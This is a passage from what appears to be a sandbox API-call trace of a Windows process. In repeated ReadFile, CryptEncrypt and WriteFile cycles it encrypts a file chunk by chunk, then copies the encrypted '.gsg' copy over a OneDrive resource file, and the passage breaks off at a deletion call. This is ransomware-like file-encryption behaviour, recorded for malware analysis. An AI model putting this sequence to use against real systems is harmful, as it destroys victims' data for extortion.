lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.657] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.658] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.659] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.660] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.661] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.662] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.663] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0287.664] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0287.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0287.664] CloseHandle (hObject=0x5d4c) returned 1 [0287.664] CloseHandle (hObject=0x5d3c) returned 1 [0287.664] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0287.670] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0287.670] DeleteFileA 